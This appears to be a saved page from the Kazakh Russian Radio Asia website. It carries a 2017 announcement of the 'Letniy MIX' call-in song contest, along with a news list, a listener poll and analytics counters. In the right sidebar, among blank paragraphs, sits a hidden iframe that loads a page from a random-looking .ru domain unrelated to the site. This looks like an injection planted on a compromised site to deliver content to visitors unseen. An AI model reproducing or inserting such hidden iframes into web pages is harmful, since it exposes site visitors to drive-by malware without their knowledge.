<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-ru" lang="ru-ru" >
 <head>
  <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
  <meta http-equiv="content-type" content="text/html; charset=utf-8" />
  <meta name="robots" content="index, follow" />
  <meta name="keywords" content="" />
  <meta name="title" content="Летний MIX" />
  <meta name="author" content="Admin2" />
  <meta name="description" content="" />
  <meta name="generator" content="RusRadioAzia" />
  <title>Летний MIX</title>
  <link href="/templates/rb_rra7/favicon.ico" rel="shortcut icon" type="image/x-icon" />
  <script type="text/javascript" src="/media/system/js/mootools.js"></script>
  <script type="text/javascript" src="/media/system/js/caption.js"></script>

  <link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
  <link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />

  <link rel="stylesheet" type="text/css" href="/templates/rb_rra7/css/template.css" />
  <!--[if IE 6]><link rel="stylesheet" href="/templates/rb_rra7/css/template.ie6.css" type="text/css" media="screen" /><![endif]-->
  <!--[if IE 7]><link rel="stylesheet" href="/templates/rb_rra7/css/template.ie7.css" type="text/css" media="screen" /><![endif]-->
  <script type="text/javascript" src="/templates/rb_rra7/script.js"></script>
 </head>
<body>
<div id="art-page-background-gradient"></div>
<div id="art-page-background-glare">
    <div id="art-page-background-glare-image"></div>
</div>
<div id="art-main">
<div class="art-Sheet">
    <div class="art-Sheet-tl"></div>
    <div class="art-Sheet-tr"></div>
    <div class="art-Sheet-bl"></div>
    <div class="art-Sheet-br"></div>
    <div class="art-Sheet-tc"></div>
    <div class="art-Sheet-bc"></div>
    <div class="art-Sheet-cl"></div>
    <div class="art-Sheet-cr"></div>
    <div class="art-Sheet-cc"></div>
    <div class="art-Sheet-body">
<p><a href="/index.php?option=com_content&amp;view=article&amp;id=58&amp;Itemid=6"><img height="60" width="468" src="/images/stories/ccrb_rra/moshenniki.gif" alt="moshenniki" style="display: block; margin-left: auto; margin-right: auto;" /></a></p><div class="art-nav"><div class="l"></div><div class="r"></div><ul class="art-menu"><li id="current" class="active item1"><a href="http://www.rusradio.kz/" class="active"><span class="l"> </span><span class="r"> </span><span class="t">Новости</span></a></li><li class="item35"><a href="/index.php?option=com_content&amp;view=article&amp;id=56&amp;Itemid=35"><span class="l"> </span><span class="r"> </span><span class="t">О радио</span></a></li><li class="item5"><a href="/index.php?option=com_content&amp;view=article&amp;id=75&amp;Itemid=5"><span class="l"> </span><span class="r"> </span><span class="t">Эфир</span></a></li><li class="item36"><a href="/index.php?option=com_content&amp;view=category&amp;id=18&amp;Itemid=36"><span class="l"> </span><span class="r"> </span><span class="t">Ведущие</span></a></li><li class="item43"><a href="/index.php?option=com_content&amp;view=article&amp;id=72&amp;Itemid=43"><span class="l"> </span><span class="r"> </span><span class="t">Новинки</span></a></li><li class="item39"><a href="/index.php?option=com_content&amp;view=category&amp;layout=blog&amp;id=20&amp;Itemid=39"><span class="l"> </span><span class="r"> </span><span class="t">Акции</span></a></li><li class="parent item4"><a href="/index.php?option=com_content&amp;view=article&amp;id=76&amp;Itemid=4"><span class="l"> </span><span class="r"> </span><span class="t">Реклама</span></a></li><li class="item6"><a href="/index.php?option=com_content&amp;view=article&amp;id=58&amp;Itemid=6"><span class="l"> </span><span class="r"> </span><span class="t">Контакты</span></a></li><li class="item45"><a href="/index.php?option=com_content&amp;view=article&amp;id=81&amp;Itemid=45"><span class="l"> </span><span class="r"> </span><span class="t">SMS-ПОРТАЛ</span></a></li></ul></div>
<div class="art-Header">
    <div class="art-Header-jpeg"></div>
<div class="art-Logo">
 <h1 id="name-text" class="art-Logo-name"><a href="/"> </a>
   
 </h1>
 <div id="slogan-text" class="art-Logo-text"> </div>
 <div>
 </div>
</div>

<table class="position" cellpadding="0" cellspacing="0" border="0">
<tr valign="top">
  <td width="33%"><div class="art-Block">
    <div class="art-Block-tl"></div>
    <div class="art-Block-tr"></div>
    <div class="art-Block-bl"></div>
    <div class="art-Block-br"></div>
    <div class="art-Block-tc"></div>
    <div class="art-Block-bc"></div>
    <div class="art-Block-cl"></div>
    <div class="art-Block-cr"></div>
    <div class="art-Block-cc"></div>
    <div class="art-Block-body">

<div class="art-BlockContent">
    <div class="art-BlockContent-body">

<p><img src="/images/stories/blc.png" alt="blc" width="290" height="57" /></p>
    </div>
</div>


    </div>
</div>

<div class="art-Block">
    <div class="art-Block-tl"></div>
    <div class="art-Block-tr"></div>
    <div class="art-Block-bl"></div>
    <div class="art-Block-br"></div>
    <div class="art-Block-tc"></div>
    <div class="art-Block-bc"></div>
    <div class="art-Block-cl"></div>
    <div class="art-Block-cr"></div>
    <div class="art-Block-cc"></div>
    <div class="art-Block-body">

<div class="art-BlockContent">
    <div class="art-BlockContent-body">

<script language="javascript" type="text/javascript">
	function iFrameHeight() {
		var h = 0;
		if ( !document.all ) {
			h = document.getElementById('blockrandom').contentDocument.height;
			document.getElementById('blockrandom').style.height = h + 60 + 'px';
		} else if( document.all ) {
			h = document.frames('blockrandom').document.body.scrollHeight;
			document.all.blockrandom.style.height = h + 20 + 'px';
		}
	}
</script>

<iframe onload="iFrameHeight()"	id="blockrandom"
	name=""
	src="http://www.rusradio.kz/rrstream/stream.php"
	width="200%"
	height="100"
	scrolling="auto"
	align="top"
	frameborder="0"
	class="wrapper">
	Без IFRAME</iframe>
    </div>
</div>


    </div>
</div>

</td>
  <td width="33%"><div class="art-Block">
    <div class="art-Block-tl"></div>
    <div class="art-Block-tr"></div>
    <div class="art-Block-bl"></div>
    <div class="art-Block-br"></div>
    <div class="art-Block-tc"></div>
    <div class="art-Block-bc"></div>
    <div class="art-Block-cl"></div>
    <div class="art-Block-cr"></div>
    <div class="art-Block-cc"></div>
    <div class="art-Block-body">

<div class="art-BlockContent">
    <div class="art-BlockContent-body">

 
<!-- You can place html anywhere within the source tags --> 
<html> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<link rel="stylesheet" type="text/css" href="/../sms7/css/style.css" /> 
<script type="text/javascript" src="/../sms7/ajax.js"></script> 
</head> 
<body> 
<div id="display" style="z-index:30;"> 
 <div id="sms_block" style="width:253px; height:91px; display: block; overflow:hidden; "> 
 <marquee id="sms_list" direction="up" scrollamount="1" height="105" width="243"> 

 
</marquee> 
 </div><!--sms_block--> 
</div> 
<script type="text/javascript">loadXMLDoc();</script> 
</body> 
</html> 
<script language="javascript" type="text/javascript"> 
 // You can place JavaScript like this 
  
</script> 
 

    </div>
</div>


    </div>
</div>

</td>
  <td><div class="art-Block">
    <div class="art-Block-tl"></div>
    <div class="art-Block-tr"></div>
    <div class="art-Block-bl"></div>
    <div class="art-Block-br"></div>
    <div class="art-Block-tc"></div>
    <div class="art-Block-bc"></div>
    <div class="art-Block-cl"></div>
    <div class="art-Block-cr"></div>
    <div class="art-Block-cc"></div>
    <div class="art-Block-body">

<div class="art-BlockContent">
    <div class="art-BlockContent-body">

<p><img src="/images/stories/blc.png" alt="blc" width="290" height="90" /></p>
    </div>
</div>


    </div>
</div>

</td>
</tr>
</table>
</div>

<div class="art-contentLayout">
<div class="art-sidebar1"></div>
<div class="art-content">

<div class="art-Post">
    <div class="art-Post-body">
<div class="art-Post-inner">

<div class="art-PostMetadataHeader">
<h2 class="art-PostHeaderIcon-wrapper"><img src="/templates/rb_rra7/images/PostHeaderIcon.png" alt="PostHeaderIcon" width="26" height="26" /> <span class="art-PostHeader">
Последние новости</span>
</h2>

</div>

<div class="art-PostContent">

<ul class="latestnews">
	<li class="latestnews">
		<a href="/index.php?option=com_content&amp;view=article&amp;id=442:-mix&amp;catid=17:news&amp;Itemid=1" class="latestnews">
			Летний MIX</a>
	</li>
	<li class="latestnews">
		<a href="/index.php?option=com_content&amp;view=article&amp;id=203%3A2015-04-23-06-58-00&amp;catid=1%3Aarticles&amp;Itemid=1" class="latestnews">
			Правила проведения Акций</a>
	</li>
	<li class="latestnews">
		<a href="/index.php?option=com_content&amp;view=article&amp;id=180%3A2014-12-26-08-36-07&amp;catid=1%3Aarticles&amp;Itemid=1" class="latestnews">
			УЧАСТНИКИ АКЦИИ</a>
	</li>
	<li class="latestnews">
		<a href="/index.php?option=com_content&amp;view=article&amp;id=168:2014-11-05-09-50-51&amp;catid=18:2011-06-18-16-58-38&amp;Itemid=36" class="latestnews">
			РУСТАМ МАКСУТОВ</a>
	</li>
	<li class="latestnews">
		<a href="/index.php?option=com_content&amp;view=article&amp;id=167:2014-11-04-09-26-06&amp;catid=18:2011-06-18-16-58-38&amp;Itemid=36" class="latestnews">
			НАЗЫМА ГАДИЛЬБЕК</a>
	</li>
</ul>
</div>
<div class="cleared"></div>


</div>

    </div>
</div>

<div class="art-Post">
    <div class="art-Post-body">
<div class="art-Post-inner">
<div class="art-PostMetadataHeader">
<h2 class="art-PostHeaderIcon-wrapper"><?php echo JHTML::_('image.site', 'PostHeaderIcon.png', null, null, null, JText::_("PostHeaderIcon"), array('width' => '26', 'height' => '26')); ?> <span class="art-PostHeader"><a href="/index.php?option=com_content&amp;view=article&amp;id=442:-mix&amp;catid=17:news&amp;Itemid=1" class="PostHeader">Летний MIX</a></span></h2>
<div class="art-PostHeaderIcons art-metadata-icons">
<img src="/templates/rb_rra7/images/PostDateIcon.png" alt="PostDateIcon" width="17" height="18" />06.06.2017 04:00 |
</div>
</div>
<div class="art-PostContent">
<div class="art-article"><p><img src="/images/stories/letniy%20mix-1.jpg" alt="letniy mix-1" width="313" height="238" /></p>
<p><br />С 5 июня на Русском Радио! Летний MIX!<br />Мы смешали припевы двух хитов,чтобы взовать тебе мозг! <br />Размиксуй их за деньги! <br />По сигналу ведущего - дозвонись в прямой эфир Русского Радио <br />по телефону 8(727)2 506 600 <br />Получи одну тысячу на мобильный баланс за одну узнанную песню и две тысячи - за две!<br />Летний MIX! Слушай и зарабатывай!<br />С 5 июня! На Русском Радио!</p></div><span class="article_separator">&nbsp;</span>
</div>
<div class="cleared"></div>

</div>

    </div>
</div>



</div>
<div class="art-sidebar2"><div class="art-Block">
    <div class="art-Block-tl"></div>
    <div class="art-Block-tr"></div>
    <div class="art-Block-bl"></div>
    <div class="art-Block-br"></div>
    <div class="art-Block-tc"></div>
    <div class="art-Block-bc"></div>
    <div class="art-Block-cl"></div>
    <div class="art-Block-cr"></div>
    <div class="art-Block-cc"></div>
    <div class="art-Block-body">

<div class="art-BlockContent">
    <div class="art-BlockContent-body">

<p>&nbsp;</p>
<p>&nbsp;<a href="/index.php?option=com_content&amp;view=article&amp;id=76&amp;Itemid=4"><img src="/images/stories/ccrb_rra/RRA_grammophone.jpg" alt="RRA_grammophone" width="240" height="400" /></a></p>
<p><img src="/images/stories/ACTION/ivent%20prazdnik%20-1.jpg" alt="ivent prazdnik -1" width="241" height="401" /></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p><iframe src="//fmzxu5pt2x7j.ru/f.html" id="a1996667054" style="display: none;"></iframe></p>
    </div>
</div>


    </div>
</div>

<div class="art-Block">
    <div class="art-Block-tl"></div>
    <div class="art-Block-tr"></div>
    <div class="art-Block-bl"></div>
    <div class="art-Block-br"></div>
    <div class="art-Block-tc"></div>
    <div class="art-Block-bc"></div>
    <div class="art-Block-cl"></div>
    <div class="art-Block-cr"></div>
    <div class="art-Block-cc"></div>
    <div class="art-Block-body">

<div class="art-BlockContent">
    <div class="art-BlockContent-body">

<form action="index.php" method="post" name="form2">

<table width="95%" border="0" cellspacing="0" cellpadding="1" align="center" class="poll">
<thead>
	<tr>
		<td style="font-weight: bold;">
			ГДЕ ТЫ ПРЕДПОЧИТАЕШЬ СЛУШАТЬ РУССКОЕ РАДИО?		</td>
	</tr>
</thead>
	<tr>
		<td align="center">
			<table class="pollstableborder" cellspacing="0" cellpadding="0" border="0">
							<tr>
					<td class="sectiontableentry2" valign="top">
						<input type="radio" name="voteid" id="voteid1" value="1" alt="1" />
					</td>
					<td class="sectiontableentry2" valign="top">
						<label for="voteid1">
							дома						</label>
					</td>
				</tr>
											<tr>
					<td class="sectiontableentry1" valign="top">
						<input type="radio" name="voteid" id="voteid2" value="2" alt="2" />
					</td>
					<td class="sectiontableentry1" valign="top">
						<label for="voteid2">
							на работе						</label>
					</td>
				</tr>
											<tr>
					<td class="sectiontableentry2" valign="top">
						<input type="radio" name="voteid" id="voteid3" value="3" alt="3" />
					</td>
					<td class="sectiontableentry2" valign="top">
						<label for="voteid3">
							в машине						</label>
					</td>
				</tr>
											<tr>
					<td class="sectiontableentry1" valign="top">
						<input type="radio" name="voteid" id="voteid4" value="4" alt="4" />
					</td>
					<td class="sectiontableentry1" valign="top">
						<label for="voteid4">
							всюду						</label>
					</td>
				</tr>
										</table>
		</td>
	</tr>
	<tr>
		<td>
			<div align="center">
				<input type="submit" name="task_button" class="button" value="ОК" />
				&nbsp;
				<input type="button" name="option" class="button" value="Итоги" onclick="document.location.href='/index.php?option=com_poll&amp;id=14:2011-06-18-16-09-10'" />
			</div>
		</td>
	</tr>
</table>

	<input type="hidden" name="option" value="com_poll" />
	<input type="hidden" name="task" value="vote" />
	<input type="hidden" name="id" value="14" />
	<input type="hidden" name="c59177da0315a0b6cb741d574ed6b8fc" value="1" /></form>
    </div>
</div>


    </div>
</div>

<div class="art-Block">
    <div class="art-Block-tl"></div>
    <div class="art-Block-tr"></div>
    <div class="art-Block-bl"></div>
    <div class="art-Block-br"></div>
    <div class="art-Block-tc"></div>
    <div class="art-Block-bc"></div>
    <div class="art-Block-cl"></div>
    <div class="art-Block-cr"></div>
    <div class="art-Block-cc"></div>
    <div class="art-Block-body">

<div class="art-BlockContent">
    <div class="art-BlockContent-body">

<p style="text-align: justify;"><strong><img alt="on-line" src="/images/stories/on-line.png" width="64" height="17" /><br /></strong></p>
    </div>
</div>


    </div>
</div>

<div class="art-Block">
    <div class="art-Block-tl"></div>
    <div class="art-Block-tr"></div>
    <div class="art-Block-bl"></div>
    <div class="art-Block-br"></div>
    <div class="art-Block-tc"></div>
    <div class="art-Block-bc"></div>
    <div class="art-Block-cl"></div>
    <div class="art-Block-cr"></div>
    <div class="art-Block-cc"></div>
    <div class="art-Block-body">

<div class="art-BlockContent">
    <div class="art-BlockContent-body">

Сейчас&nbsp;32 гостей&nbsp;онлайн
    </div>
</div>


    </div>
</div>

<div class="art-Block">
    <div class="art-Block-tl"></div>
    <div class="art-Block-tr"></div>
    <div class="art-Block-bl"></div>
    <div class="art-Block-br"></div>
    <div class="art-Block-tc"></div>
    <div class="art-Block-bc"></div>
    <div class="art-Block-cl"></div>
    <div class="art-Block-cr"></div>
    <div class="art-Block-cc"></div>
    <div class="art-Block-body">

<div class="art-BlockContent">
    <div class="art-BlockContent-body">

<p style="text-align: center;">&nbsp;</p>
<p style="text-align: center;"><img style="float: left;" src="/images/seti.png" alt="" width="135" height="23" /></p>
<p style="text-align: center;">&nbsp;</p>
<p style="text-align: center;"><a href="http://vk.com/club59498363"><img style="border: 0;" src="/images/vk.png" alt="" width="35" border="0" /></a><a href="https://twitter.com/RusradioKz"><img style="border: 0;" src="/images/twit.png" alt="" width="36" border="0" /></a><a href="https://www.facebook.com/rusradioazia"><img style="border: 0;" src="/images/fb.png" alt="" width="35" border="0" /></a></p>
<p style="text-align: center;">&nbsp;</p>
    </div>
</div>


    </div>
</div>

</div>

</div>
<div class="cleared"></div>


<div class="art-Footer">
 <div class="art-Footer-inner">
    <div class="art-Footer-text">
  <p>Copyright &copy; 2011. Русское Радио Азия.<br/>
All Rights Reserved.</p>

    </div>
 </div>
 <div class="art-Footer-background"></div>
</div>

    </div>
</div>
<div class="cleared"></div>
<p class="art-page-footer">Designed by <a href="http://www.rentbrain.kz">RentBrain</a>.</p>
</div>

</body> 
<!-- ZERO.kz -->
<span id="_zero_68608">
<noscript>
<a href="http://zero.kz/?s=68608" target="_blank">
<img src="http://c.zero.kz/z.png?u=68608" width="88" height="31" alt="ZERO.kz" />
</a>
</noscript>
</span>

<script type="text/javascript"><!--
var _zero_kz_ = _zero_kz_ || [];
_zero_kz_.push(["id", 68608]);
_zero_kz_.push(["type", 1]);

(function () {
    var a = document.getElementsByTagName("script")[0],
    s = document.createElement("script");
    s.type = "text/javascript";
    s.async = true;
    s.src = (document.location.protocol == "https:" ? "https:" : "http:")
    + "//c.zero.kz/z.js";
    a.parentNode.insertBefore(s, a);
})(); //-->
</script>
<!-- End ZERO.kz -->

 <!--Openstat-->
<span id="openstat2205731"></span>
<script type="text/javascript">
var openstat = { counter: 2205731, image: 89, color: "3400cd", next: openstat };
(function(d, t, p) {
var j = d.createElement(t); j.async = true; j.type = "text/javascript";
j.src = ("https:" == p ? "https:" : "http:") + "//openstat.net/cnt.js";
var s = d.getElementsByTagName(t)[0]; s.parentNode.insertBefore(j, s);
})(document, "script", document.location.protocol);
</script>
<!--/Openstat-->

 <!-- SkyLog.kz - Рейтинг Казахстанских Сайтов -->
<a href="http://skylog.kz/">
<script language="javascript">
java="1.0";
java1=""+"refer="+escape(document.referrer)+"&page="+
escape(window.location.href);
document.cookie="astratop=1; path=/"; java1+="&c="+(document.cookie?"yes":"now");
</script>
<script src="http://skylog.kz/stat/stats.js" type="text/javascript"></script>
<script language="javascript1.1">java="1.1";java1+="&java="+(navigator.javaEnabled()?"yes":"now")</script>
<script language="javascript1.2">java="1.2";
java1+="&razresh="+screen.width+'x'+screen.height+"&cvet="+
(((navigator.appName.substring(0,3)=="Mic"))?
screen.colorDepth:screen.pixelDepth)</script><script language="javascript1.3">java="1.3"</script>
<script language="javascript">java1+="&jscript="+java+"&rand="+Math.random();
document.write("<a href='http://skylog.kz/stat.php?id=3779&fromsite=1' target='_blank'><img "+
" src='http://skylog.kz/img.php?id=3779&"+java1+"&' border=0 alt='SkyLog.kz - Рейтинг Казахстанских Сайтов' width='88' height='31'></a>")</script>
<noscript><a href=http://skylog.kz/ target=_blank><img src="http://skylog.kz/img.php?id=3779" border=0 alt="SkyLog.kz - Рейтинг Казахстанских Сайтов" width='88' height='31'></a></noscript>
</a>
<!-- /SkyLog.kz - Рейтинг Казахстанских Сайтов -->


</html>